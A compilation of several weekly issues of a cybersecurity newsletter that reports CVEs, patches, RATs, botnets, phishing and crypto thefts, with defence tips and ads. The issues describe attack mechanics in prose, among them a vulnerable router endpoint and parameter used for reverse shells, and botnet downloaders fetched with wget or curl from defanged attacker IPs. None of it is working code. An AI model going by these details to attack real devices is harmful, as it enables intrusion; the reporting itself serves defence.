🚨 Beware of Email Spoofs! Cybercriminals Ramp Up Malspam Attacks 📧

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your weekly cybersecurity newsletter that wishes you a Happy New Year! 🎉🥳🎊 Unless you’re a cybercriminal, in which case GTFO 🤬

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Mitel MiCollab and Oracle WebLogic Server, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣 

The MiCollab the world’s been waiting for 🙃

🚨 New Vulnerabilities Added to CISA KEV Catalog! 📖

CISA has flagged three critical flaws in Mitel MiCollab and Oracle WebLogic Server due to active exploitation. Here's what you need to know! 🛡️💻

The Vulnerabilities

1️⃣ CVE-2024-41713 (CVSS 9.1):

Path traversal in Mitel MiCollab allowing unauthorized, unauthenticated access.

2️⃣ CVE-2024-55550 (CVSS 4.4):

Path traversal in Mitel MiCollab enabling authenticated admins to read local files.

💡 Combo Alert: These two can be chained for remote, unauthenticated access to arbitrary server files! ⚠️

3️⃣ CVE-2020-2883 (CVSS 9.8):

A severe flaw in Oracle WebLogic Server exploitable by unauthenticated attackers via IIOP or T3 protocols.

Why It Matters

Mitel MiCollab flaws were discovered during a probe into another critical bug (CVE-2024-35286, CVSS 9.8).

Oracle warned about CVE-2020-2883 in 2020, noting active exploitation reports.

Over 5,600 Mitel MiCollab instances are exposed online, with the majority in the U.S., Canada, and the U.K. 🌍 

🚨 Patch Now:

Federal agencies must update by Jan 28, 2025, per Binding Operational Directive (BOD) 22-01.

Check Mitel and Oracle resources for latest patches and updates. 

💡 Stay Vigilant: 

  • Review your systems for potential exposure.

  • Monitor logs for signs of exploitation. 

🔧 Don’t wait for a breach—act now to secure your systems! 🖥️🔒 

Now, on to this week’s hottest cybersecurity news stories: 

  • 👾 Malspam evades SPF, DMARK security by utilising neglected domains 🌐

  • 🕵🏼‍♂️ Researchers lift the lid on NonEulid RAT using UAC bypass, AMSI evasion 🐀 

  • ⚠️ 2025: Top malware threats to watch out for this coming year. Take notes 📝

SPF 50 won’t even protect you ☀️

🚨 Beware of Email Spoofs! Cybercriminals Ramp Up Malspam Attacks 📧

Cybersecurity researchers report a surge in spoofed email campaigns 🎯 targeting unsuspecting victims by faking sender addresses to appear legitimate. This tactic helps bypass security systems and trick users into engaging with malicious content.

🛠️ Old Tricks, New Domains

While email authentication protocols like DKIM, DMARC, and SPF exist to combat spoofing, attackers now exploit neglected domains without proper DNS records. These domains, though unused for years, successfully slip past modern filters.

💡 Tactics in Play:

🔹 Phishing with QR Codes: Fake emails (tax-related in Mandarin) use QR codes linked to phishing sites, stealing IDs and card details.

🔹 Brand Spoofs: Imitating Amazon, Mastercard, and SMBC to harvest credentials via fraudulent login pages.

🔹 Extortion Scams: Threats of leaked “embarrassing videos” demand Bitcoin payments 💸, with fake claims of system compromise.

📋 Other Alarming Trends:

  • Phishing Pages: Hosted on trusted platforms like Canva, Dropbox, and Google AMP.

  • SMS Phishing: Pretending to be law enforcement, targeting victims with fake fines or renewal notices.

  • Sophisticated Scams: Social engineering against Middle Eastern banking customers, exploiting leaked personal data.

🔐 How to Stay Safe:

✔️ Verify sender domains and avoid clicking on unknown links.

✔️ Update your DNS records if you manage domains.

✔️ Report suspicious emails to your email provider.

✔️ Enable 2FA for critical accounts.

⚠️ Pro Tip: Remember, no legitimate organization will ask for sensitive info via email. Stay vigilant! 🛡️

VaultCraft V2 secures $100M+ BTC from Matrixport

VaultCraft launches V2 in partnership with Safe, lands $100M+ in Bitcoin

  • Matrixport entrusts VaultCraft with $100M+ Bitcoin

  • OKX Web3 rolls out Safe Smart Vaults with $250K+ rewards

Visit VaultCraft

Eu wot? 💀

🚨 NonEuclid RAT: A Sophisticated Cyber Threat Unleashed 🖥️

Cybersecurity experts have uncovered NonEuclid, a cutting-edge remote access trojan (RAT) targeting Windows systems. Written in C#, this malware allows attackers to control compromised devices remotely while deploying advanced techniques to evade detection.

🕵️‍♂️ How It Works:

  • Stealth Tactics: Detects analysis tools like taskmgr.exe and processhacker.exe to evade security checks.

  • Sandbox Detection: Identifies virtual environments and terminates if detected.

  • Antivirus Bypass: Disables Microsoft Defender exclusions and dodges AMSI scans.

  • Persistence Mechanisms: Alters Windows Registry and schedules tasks to maintain control.

🔓 Ransomware Twist:

NonEuclid goes beyond typical RAT functions by encrypting files (e.g., .CSV, .TXT) and renaming them with the ".NonEuclid" extension. Essentially, it doubles as ransomware.

🌐 The Spread:

Promoted aggressively on underground forums, Discord, and YouTube since November 2024, the malware includes tutorials, making it attractive to cybercriminals looking for ready-made solutions.

💡 Key Features:

  • Privilege Escalation: Circumvents User Account Control (UAC) to execute commands.

  • Process Management: Uses Windows API calls to terminate analysis tools.

  • Advanced Evasion: Combines stealth and adaptability to outsmart security tools. 

⚠️ Stay Safe!

  • Keep your antivirus updated 🛡️.

  • Regularly review and tighten system privileges.

  • Monitor for suspicious registry changes or scheduled tasks.

  • Educate your team about emerging threats like NonEuclid.

🛑 Remember: The rise of advanced malware like NonEuclid highlights the importance of robust cybersecurity defenses and constant vigilance. Stay ahead of the curve! 🚀

Hire Ava, the AI SDR & Get Meetings on Autopilot

Ava automates your entire outbound demand generation process, including:

  • Intent-Driven Lead Discovery

  • High Quality Emails with Waterfall Personalization

  • Follow-Up Management

Free up your sales team to focus on high-value interactions and closing deals, while Ava handles the time-consuming tasks.

Book a demo to see how Ava can 10x your outbound.

And the award for biggest cyberthreat of 2025 goes to… 🏆

🚨 Top Malware Threats to Watch Out for in 2025 💻⚠️

As cyber threats evolve, staying prepared is more important than ever. Here are 5 common malware families you should start preparing to counter today:

1️⃣ Lumma#

🔍 What It Does:

  • Steals sensitive data, including credentials and financial info.

  • Logs browsing history and targets cryptocurrency wallets. 

📦 How It Spreads:

Fake CAPTCHA pages, torrents, and phishing emails. 

💡 Defense Tip:

Use sandbox analysis to identify indicators of compromise (IOCs) and enhance your defenses.

2️⃣ XWorm

🔍 What It Does:

  • Offers remote control to attackers.

  • Monitors keystrokes, webcam, audio, and network activity.

📦 How It Spreads:

Delivered through phishing emails with malicious archives.

💡 Defense Tip:

Be cautious with unsolicited emails, especially those containing password-protected archives.

3️⃣ AsyncRAT

🔍 What It Does:

  • Records screens, logs keystrokes, and installs additional malware.

  • Overwhelms websites with attacks and disables security software.

📦 How It Spreads:

Disguised as pirated software or embedded in AI-generated scripts.

💡 Defense Tip:

Avoid downloading unverified software and use advanced sandbox tools for analysis.

4️⃣ Remcos

🔍 What It Does:

Markets itself as a legitimate tool but enables remote control of systems.

Steals data and exploits vulnerabilities like CVE-2017-11882.

📦 How It Spreads:

Distributed via phishing emails with malicious scripts.

💡 Defense Tip:

Regularly patch vulnerabilities and monitor for suspicious PowerShell or Command Prompt activity.

5️⃣ LockBit

🔍 What It Does:

  • Encrypts files and demands ransom for decryption.

  • Operates as part of a Ransomware-as-a-Service (RaaS) model.

📦 How It Spreads:

Targeted attacks on high-profile organizations.

💡 Defense Tip:

Ensure regular backups, implement endpoint protection, and stay informed about emerging ransomware variants like LockBit 4.0.

🛡️ Take Action:

Use tools like ANY.RUN’s Interactive Sandbox for real-time malware analysis. Proactively hunt for threats and bolster your cybersecurity defenses to face 2025 with confidence! 🚀

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Why is multi-cloud data protection so hard?

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Rubrik

Cloud Conversations: Cloud storytelling meets data security

600k Google Chrome users exposed

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your weekly cybersecurity newsletter that’s the only guaranteed protection against an #AmberAlert cyberstorm ⛈️⛈️⛈️

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Palo Alto, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Take that, ya DoSsers! 🙃

🚨🔥 High-Severity PAN-OS Vulnerability Alert! 🔥🚨

Palo Alto Networks has uncovered CVE-2024-3393, a DoS vulnerability (CVSS score: 8.7) impacting PAN-OS software. This bug could let attackers send malicious packets that reboot firewalls, potentially causing chaos! 🌐💥

What's Affected?

🛑 PAN-OS Versions: 10.X, 11.X, and Prisma Access on PAN-OS 10.2.8+ (or earlier than 11.2.3).

✅ Fixed in: PAN-OS 10.1.14-h8, 10.2.10-h12, 11.1.5, 11.2.3, and later.

What's Happening?

  • Malicious DNS packets can trigger firewall reboots.

  • Repeated attacks = maintenance mode lockdown.

  • Firewalls with DNS Security logging enabled are at risk.

What You Can Do! 🛡️

Patch ASAP using the latest updates for your PAN-OS version.

  • Disable DNS Security logging for unmanaged firewalls:

  • Go to: Objects > Security Profiles > Anti-Spyware > DNS Policies > DNS Security.

  • Prisma Access Users: Open a support case for quick action!

  • CISA Adds to KEV Catalog

This vulnerability is now on the CISA KEV list, with a deadline for Federal Civilian Agencies to patch by Jan 20, 2025.

🔧 Proactive measures = safer firewalls. Protect your networks now! 🖥️💪

Now, on to this week’s hottest cybersecurity news stories: 

  • 🙍🏻‍♂️ 600k Google Chrome users exposed to data theft via 16 extensions 🔌

  • 🔐 Default credentials expose 15,000+ Four-Faith routers to new exploit 👾

  • 🌶️ Don’t get burned by CAPSAICIN, a new strain targeting D-Link routers 📡

Hackers: There’s no place like Chrome 💀

Wizard Of Oz GIF by Turner Classic Movies

Gif by tcm on Giphy

🚨 Massive Chrome Extension Hack Hits 600,000+ Users! 🙍🏻‍♂️

Cybercriminals have compromised at least 16 popular Chrome browser extensions, putting over 600,000 users at risk of data theft and credential exposure.

💻 How It Happened:

Hackers targeted extension publishers with phishing emails disguised as messages from "Google Chrome Web Store Developer Support." Victims were tricked into granting permissions to a malicious app, allowing attackers to inject harmful code into legitimate extensions. The compromised versions stole cookies, access tokens, and other sensitive data.

🔥 The first known victim, Cyberhaven, saw its extension hijacked on December 24, enabling malicious code to communicate with an external server, download harmful files, and exfiltrate user information.

🎯 Who’s Affected?

This wasn’t an isolated attack! Researchers uncovered more impacted extensions, including:

🌟 AI tools like AI Assistant – ChatGPT and Bard AI Chat Extension

🔒 VPNs like VPNCity and Internxt VPN

🎥 Tools like VidHelper Video Downloader and Reader Mode

📜 Even Rewards Search Automator and Keyboard History Recorder

⚡ Why It’s Dangerous:

The malicious versions could:

  • Steal sensitive data, including Facebook Ads tokens 🧑‍💻

  • Spy on users and bypass protections 🕵️‍♂️

  • Remain active on devices even after being removed from the Chrome Web Store ⚙️

💡 What You Can Do:

1️⃣ Check your extensions and remove anything suspicious or unused.

2️⃣ Update regularly to secure versions.

3️⃣ Be cautious with unexpected emails—phishing is on the rise! 🚫✉️

🌐 Why It Matters:

Browser extensions often seem harmless, but they can have extensive permissions, making them prime targets for hackers. This attack campaign highlights the need for better visibility and stricter controls over third-party tools.

Stay safe, stay updated, and protect your online world! 💪✨

Get the complete picture of AI from an expert with nearly a decade of experience.

What You Need To Know About AI is an upcoming book exploring AI’s history, what modern AI can (and can’t) do, and what it means for you and the future.

Learn how it's being used in medicine, finance, and more. Get past the hype and understand how AI works in an accessible, but not dumbed-down way.

Password123 👍

🚨 New Exploit Targets Industrial Routers! 🌐

A high-severity flaw in select Four-Faith industrial routers (models F3x24 and F3x36) has been actively exploited in the wild, according to VulnCheck. This vulnerability, tracked as CVE-2024-12856 (CVSS score: 7.2), poses a significant threat, especially if default credentials have not been updated.

💥 The Vulnerability:

The flaw allows attackers to perform OS command injection on vulnerable routers, but only if they manage to authenticate. Here’s the catch—many of these routers still use default credentials, making it easy for bad actors to bypass this restriction.

🛠️ How the Attack Works:

  • Endpoint Exploited: /apply.cgi

  • Weakness: The adj_time_year parameter in system time settings is vulnerable.

  • Payload: Attackers leverage this flaw to launch a reverse shell, giving them persistent remote access to the device.

📍 Origins of the Attack:

The latest exploitation attempt came from IP address 178.215.238[.]91, which has been linked to previous attacks on Four-Faith routers.

This IP has also been associated with the exploitation of CVE-2019-12168, another remote code execution flaw.

Reports from GreyNoise show similar attacks as recent as December 19, 2024.

🌍 Scope of the Threat:

Over 15,000 internet-facing devices are potentially at risk, according to data from Censys.

Evidence suggests these attacks may have started as early as November 2024.

Attackers appear to be spamming the entire internet at low rates, aiming to deliver a Mirai-like payload.

🔒 What You Can Do:

1️⃣ Change Default Credentials Now 🛡️—this simple step can block unauthorized access.

2️⃣ Limit Internet Exposure 🌐—restrict access to routers only to trusted networks.

3️⃣ Monitor for Unusual Activity 👀—keep an eye out for suspicious connections.

4️⃣ Await further updates: As of now, no official patch has been released.

📅 VulnCheck responsibly disclosed the flaw to Four-Faith on December 20, 2024, but there’s no word yet on a fix.

💬 Expert Insights:

Jacob Baines, VulnCheck: “The attacks aren’t widespread but are consistent, targeting the entire internet at low rates.”

🚨 Why It Matters:

Industrial routers are critical for IoT and operational systems, making vulnerabilities like CVE-2024-12856 a high-priority risk for businesses.

Stay vigilant and secure your devices to prevent falling victim to these attacks! 🛠️✨

Quick, pass the milk! 🥛👀😏

Cybersecurity researchers are ringing alarm bells over a surge in malicious campaigns targeting vulnerable D-Link routers, hijacking them into two distinct botnets:

  • FICORA (a variant of Mirai)

  • CAPSAICIN (a Kaiten/Tsunami derivative)

💥 What’s Happening?

These botnets exploit long-known vulnerabilities in D-Link routers’ HNAP (Home Network Administration Protocol) interface, enabling attackers to execute malicious commands. Vulnerabilities leveraged include:

📅 CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112—some dating back nearly a decade!

🌍 Scope of the Attacks:

FICORA: Attacks are widespread, targeting systems globally.

CAPSAICIN: Focused on East Asian regions, especially Japan and Taiwan, with peak activity on October 21–22, 2024.

🔧 How They Work:

FICORA Botnet:

1️⃣ Deploys a downloader script (multi) from IP 103.149.87[.]69.

2️⃣ Fetches malware for various Linux architectures via commands like wget, curl, and tftp.

3️⃣ Equipped with DDoS capabilities using UDP, TCP, and DNS protocols.

4️⃣ Performs brute-force attacks using a hard-coded username-password list.

CAPSAICIN Botnet:

1️⃣ Uses a downloader script (bins.sh) from IP 87.10.220[.]221.

2️⃣ Establishes a connection with its C2 server (192.110.247[.]46).

3️⃣ Sends OS info and victim "nickname" back to the C2.

4️⃣ Awaits further commands, including:

  • Execute shell commands 🖥️

  • Download files 📂

  • Launch DDoS attacks 🌐

💥 Notable DDoS methods:

  • BLACKNURSE: ICMP packet floods 🌀

  •  HTTP Flooding 📶

  • DNS Amplification 🌎

🤖 A Battle for Control:

CAPSAICIN actively terminates other botnets’ processes to dominate compromised devices, ensuring it's the sole operator.

💡 Why It Matters:

Even though these vulnerabilities were disclosed and patched long ago, many devices remain unpatched and exposed. The attacks highlight the importance of regular device updates and robust monitoring.

🛡️ What Can You Do?

🔑 Update firmware immediately to patch known vulnerabilities.

🚫 Restrict external access to router management interfaces.

🔍 Monitor network traffic for unusual activity.

🧹 Change default credentials to thwart unauthorized access.

💬 Expert Take:

“Despite patches being available for nearly a decade, these attacks persist globally,” warns Vincent Li from Fortinet FortiGuard Labs. “Keeping devices updated and secure is not optional—it’s essential.”

⚠️ Don’t let your router become a botnet’s new recruit. Protect your network now! 🌐🛡️

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

🚨 Charming Kitten is back

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your weekly cybersecurity newsletter that supports more white hats than a Beyonce halftime show 🥼💃🏾🤠 #EthicalHackers #WhiteHat #NoDiddy 💀💀💀

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Sonos, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Hackers: Sonos but yet so far 🙃

🚨 Sophos Firewall Hotfixes Released for Critical Flaws 🔒

Sophos has issued hotfixes to address three security vulnerabilities in its Firewall products, including two rated Critical (CVSS 9.8). While no evidence of active exploitation exists yet, these flaws could lead to Remote Code Execution (RCE) and privileged system access under specific conditions.

🛠️ The Vulnerabilities:

  1. CVE-2024-12727 (CVSS 9.8)

  • Type: Pre-auth SQL Injection

  • Impact: RCE when Secure PDF eXchange (SPX) and High Availability (HA) mode are configured together.

  • Affected Devices: ~0.05%.

  1. CVE-2024-12728 (CVSS 9.8)

  • Type: Weak Credentials Vulnerability

  • Impact: Persistent weak SSH passphrase allows privileged access post-HA setup if SSH is enabled.

  • Affected Devices: ~0.5%.

  1. CVE-2024-12729 (CVSS 8.8)

  • Type: Post-auth Code Injection

  • Impact: Authenticated users can execute RCE via the User Portal.

  Patched Versions:

 Hotfixes are available for affected versions (21.0 GA and earlier), including:

 v21 MR1+, v20 GA, v19.5 MR3+, and others.

 📋 Verifying Hotfix Installation:

  • CVE-2024-12727:

  • Run: cat /conf/nest_hotfix_status (Hotfix applied if value is 320+).

  • CVE-2024-12728/12729:

  • Run: system diagnostic show version-info (Hotfix applied if value is HF120424.1+).

 🔑 Mitigation Recommendations:

  • Restrict SSH access to dedicated HA links or disable WAN SSH access.

  • Use a long, random passphrase for HA setup.

  • Ensure User Portal and Webadmin are inaccessible from WAN.

⚠️ Background:

 This comes shortly after U.S. authorities charged a Chinese national for exploiting a previous Sophos zero-day (CVE-2020-12271, CVSS 9.8) that compromised 81,000 firewalls globally.

🌐 Act Now:

Apply hotfixes or implement workarounds to safeguard your systems from potential threats! 🚀✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 🐪 Iran's Charming Kitten deploys variant of BellaCiao malware 👾

  • 👨🏽‍💻 N. Korean hackers ‘Madoff’ with $308M of Bitcoin from DMM 💱

  • 🤖 OpenAI fined €15M by Italy for ChatGPT’s GDPR data violations 💸

BellaMiaow 🐱

🚨 Charming Kitten’s New Trick! 🐱✨

The Iranian hacking group Charming Kitten is back, rolling out a C++ variant of its sneaky malware, BellaCiao, now called BellaCPP! 💻🦠

🔍 What Did Kaspersky Find?

During a recent investigation in Asia, Kaspersky discovered BellaCPP on a machine that was also infected with BellaCiao. This malware family has a track record of targeting the U.S., the Middle East, and India—a global cyber troublemaker! 🌍⚠️

💡 What’s Different About BellaCPP?

While BellaCiao relied on a web shell for uploading files, running commands, and maintaining persistence, BellaCPP skips the web shell but keeps its danger:

  • SSH Tunnels: Uses a mysterious DLL file to create covert communication tunnels.

  • Stealthy Payloads: Designed to load and execute additional malware.

  • Attribution: Still linked to domains and patterns previously tied to Charming Kitten.

👀 Who Are They?

Charming Kitten (a.k.a. APT35, Mint Sandstorm, TA453, and more!) is associated with Iran’s IRGC and loves using:

  • Social engineering tricks to lure victims.

  • Exploits in widely used software like Microsoft Exchange Server and Zoho ManageEngine.

🛡️ How to Stay Safe?

  • Patch your systems regularly! 🚨

  • Monitor for unusual network traffic or SSH activity.

  • Be cautious of phishing attempts—they're pros at it! 🎯

🐾 These kittens might sound cute, but their claws are sharp. Don’t let them pounce! 🛡️✨

VaultCraft V2 secures $100M+ BTC from Matrixport

VaultCraft launches V2 in partnership with Safe, lands $100M+ in Bitcoin

  • Matrixport entrusts VaultCraft with $100M+ Bitcoin

  • OKX Web3 rolls out Safe Smart Vaults with $250K+ rewards

Visit VaultCraft

Korea criminals nab a Bit of Coin 💀

🚨 Crypto Heist Alert: $308M Stolen by North Korean Hackers! 💰

Japanese and U.S. authorities have officially linked the May 2024 theft of $308 million in cryptocurrency from DMM Bitcoin to North Korean cyber actors! 😱💻

🕵️‍♀️ Who’s Behind It?

The culprits are part of TraderTraitor (a.k.a. Jade Sleet, UNC4899, Slow Pisces), a notorious North Korea-linked group that specializes in:

  • Social engineering: Targeting multiple employees of a company at once.

  • Malware-laced apps: Often disguised as cryptocurrency tools.

  • Sophisticated scams: Even posing as recruiters or collaborators on GitHub projects.

🧑‍💻 How Did They Do It?

🎯 Targeting Employees:

In March 2024, a Ginco employee (a crypto wallet company in Japan) was tricked by a fake recruiter into running a malicious Python script.

🌐 Compromising Systems:

Using session cookies, the attackers gained access to Ginco’s communication systems.

💳 Exploiting Transactions:

In May, they manipulated a legitimate DMM Bitcoin transaction, stealing 4,502.9 BTC!

🌐 What Happened Next?

The stolen funds were moved to TraderTraitor-controlled wallets.

To cover their tracks, they used tools like:

  • Bitcoin CoinJoin Mixing Service 🌀 for anonymity.

  • Bridging services to shuffle the money further.

Ultimately, funds reached HuiOne Guarantee, a company tied to cybercrime activities.

🛡️ Stay Safe!

💡 Tips to avoid being a target:

  • Be cautious of recruiters or unsolicited messages.

  • Double-check URLs before opening or downloading anything.

  • Regularly update your security measures and monitor for unusual activity.

👀 What’s Next?

This revelation follows other North Korean cyber activity, including:

  • Lazarus Group’s SmallTiger backdoor targeting South Korean companies.

  • Ongoing attacks on the Web3 sector.

💣 These hackers are relentless—don’t let them outsmart you! 🛡️💻

It was an Open(AI) and shut case 😏

🚨 ChatGPT Fined €15M in Italy Over Data Privacy Concerns 💸

Italy’s data protection watchdog, Garante, has slapped OpenAI with a €15 million fine (~$15.66M) for mishandling personal data used to train ChatGPT.

🤷‍♂️ What’s the Issue?

OpenAI allegedly violated GDPR by:

  • Processing user data without proper legal justification.

  • Failing to notify authorities of a March 2023 data breach.

  • Not implementing age verification, exposing kids under 13 to potentially inappropriate content.

👉 What’s Next?

OpenAI must run a six-month public campaign to explain:

  • How ChatGPT collects and uses data.

  • Users’ rights to object, rectify, or delete their data.

🤖 OpenAI Responds

  • Called the decision disproportionate, noting the fine is 20x its Italian revenue.

  • Plans to appeal while staying committed to balancing AI innovation and privacy.

This marks another chapter in the global conversation around AI accountability—a sign of the times for tech and privacy regulation! 🚦💻

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

🚨 Ukraine CERT Warns of Malware Targeting Military via Fake Army+ App 📱

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your weekly cybersecurity newsletter that feels Fury towards cybercrime. Doesn’t it just make Usyk? 🤣 #FuryvsUsyk2 🥊🥊🥊

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Apache, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

A patch for Apache 👍🏻

🚨 Critical Apache Struts Vulnerability Under Attack! 🚁

A newly disclosed security flaw in Apache Struts (CVE-2024-53677, CVSS 9.5) is being actively exploited by threat actors to enable Remote Code Execution (RCE).

🔍 What’s the Risk?

● Attackers exploit file upload parameters to perform path traversal, enabling malicious file uploads.

● This can lead to executing arbitrary commands, stealing sensitive data, or deploying additional malware.

🎯 Impacted Versions:

  • Struts 2.0.0 – Struts 2.3.37 (End-of-Life)

  • Struts 2.5.0 – Struts 2.5.33

  • Struts 6.0.0 – Struts 6.3.0.2

Patched in:

Struts 6.4.0 or newer

🛡️ Mitigation Steps: 

1. Update Apache Struts to version 6.4.0+ immediately.

2. Reconfigure your applications to use the new Action File Upload mechanism and related interceptor for added security.

💡 Why It Matters:

Apache Struts powers mission-critical business workflows, public-facing portals, and internal productivity apps. A flaw like this could lead to severe business disruption and data breaches if left unpatched. 

⚡ Current Threat Activity:

  • Exploitation attempts matching a public proof-of-concept (PoC) are underway.

  • Attackers are scanning for vulnerable systems and deploying malicious scripts.

🌐 Protect Your Systems Now!

Patch immediately to stay ahead of this rapidly evolving threat. Stay secure! 🔒

Now, on to this week’s hottest cybersecurity news stories: 

  • 📱 Army+ MoD app spoofed by hackers to deceive military personnel 👨🏻‍✈️

  • 👮 Interpol calls time on victim-blaming ‘pig-butchering’ term. Woke! 😉 

  • 💸 No Meta what they fine us. No Meta what we do… Meta fined €251 😳

What’s your major malfunction?! 👾

🚨 Ukraine CERT Warns of Malware Targeting Military via Fake Army+ App 📱

The Computer Emergency Response Team of Ukraine (CERT-UA) has uncovered a new campaign by UAC-0125, a threat actor exploiting the Cloudflare Workers service to distribute malware disguised as the legitimate Army+ app, used by the Ministry of Defence to digitize operations.

🛡️ How the Attack Works

1. Fake Websites: Cloudflare Workers-hosted sites trick users into downloading a malicious Windows installer for Army+.

2. Malicious Payload: The installer, created with NSIS (Nullsoft Scriptable Install System), runs a decoy file while executing a PowerShell script to:

  • Install OpenSSH.

  • Generate RSA cryptographic keys.

  • Upload the private key to an attacker-controlled server via TOR.

3. Goal: The attackers aim to achieve remote access to compromised systems.

🎯 Threat Actor Ties

CERT-UA linked UAC-0125 to UAC-0002, also known as APT44, Sandworm, or Voodoo Bear — a group associated with Russia’s GRU Unit 74455, known for cyber-espionage and sabotage campaigns.

📈 Broader Context of Cloudflare Abuse

Phishing Surge: Reports by Fortra show a dramatic rise in abuse of Cloudflare services for phishing:

  • Cloudflare Pages: A 198% increase in attacks from 2023 to mid-2024.

  • Cloudflare Workers: A 104% rise over the same period.

  • Target: Hosting fake Microsoft 365 login and verification pages to steal credentials.

🌍 European Sanctions Against Russian Cyber Operations

The European Council has imposed sanctions targeting individuals and entities involved in Russia’s destabilizing activities:

  • GRU Unit 29155: Linked to assassinations, bombings, and cyberattacks in Europe.

  • Doppelganger Network: Disseminates pro-Russian disinformation to erode Western support for Ukraine.

  • High-ranking individuals, such as Sofia Zakharova and Nikolai Tupikin, face asset freezes and travel bans for their roles in malign influence campaigns.

🔍 What This Means

The campaign underscores how threat actors exploit legitimate platforms to mask malicious activities. It also highlights the increasing weaponization of disinformation and cyber tools in geopolitical conflicts.

💡 Stay Protected: Ensure all apps are downloaded from official sources, and monitor for unusual activity on devices! 🌐

Learn AI in 5 Minutes a Day

AI Tool Report is one of the fastest-growing and most respected newsletters in the world, with over 550,000 readers from companies like OpenAI, Nvidia, Meta, Microsoft, and more.

Our research team spends hundreds of hours a week summarizing the latest news, and finding you the best opportunities to save time and earn more using AI.

Sign up with 1-Click

Honeypot, kettle, hack 🙃

🚨 INTERPOL Pushes for 'Romance Baiting' as New Term for Crypto Scams 🌐

INTERPOL is advocating for the term "romance baiting" to replace "pig butchering" in describing scams where victims are manipulated into fake cryptocurrency investments under the guise of romantic relationships.

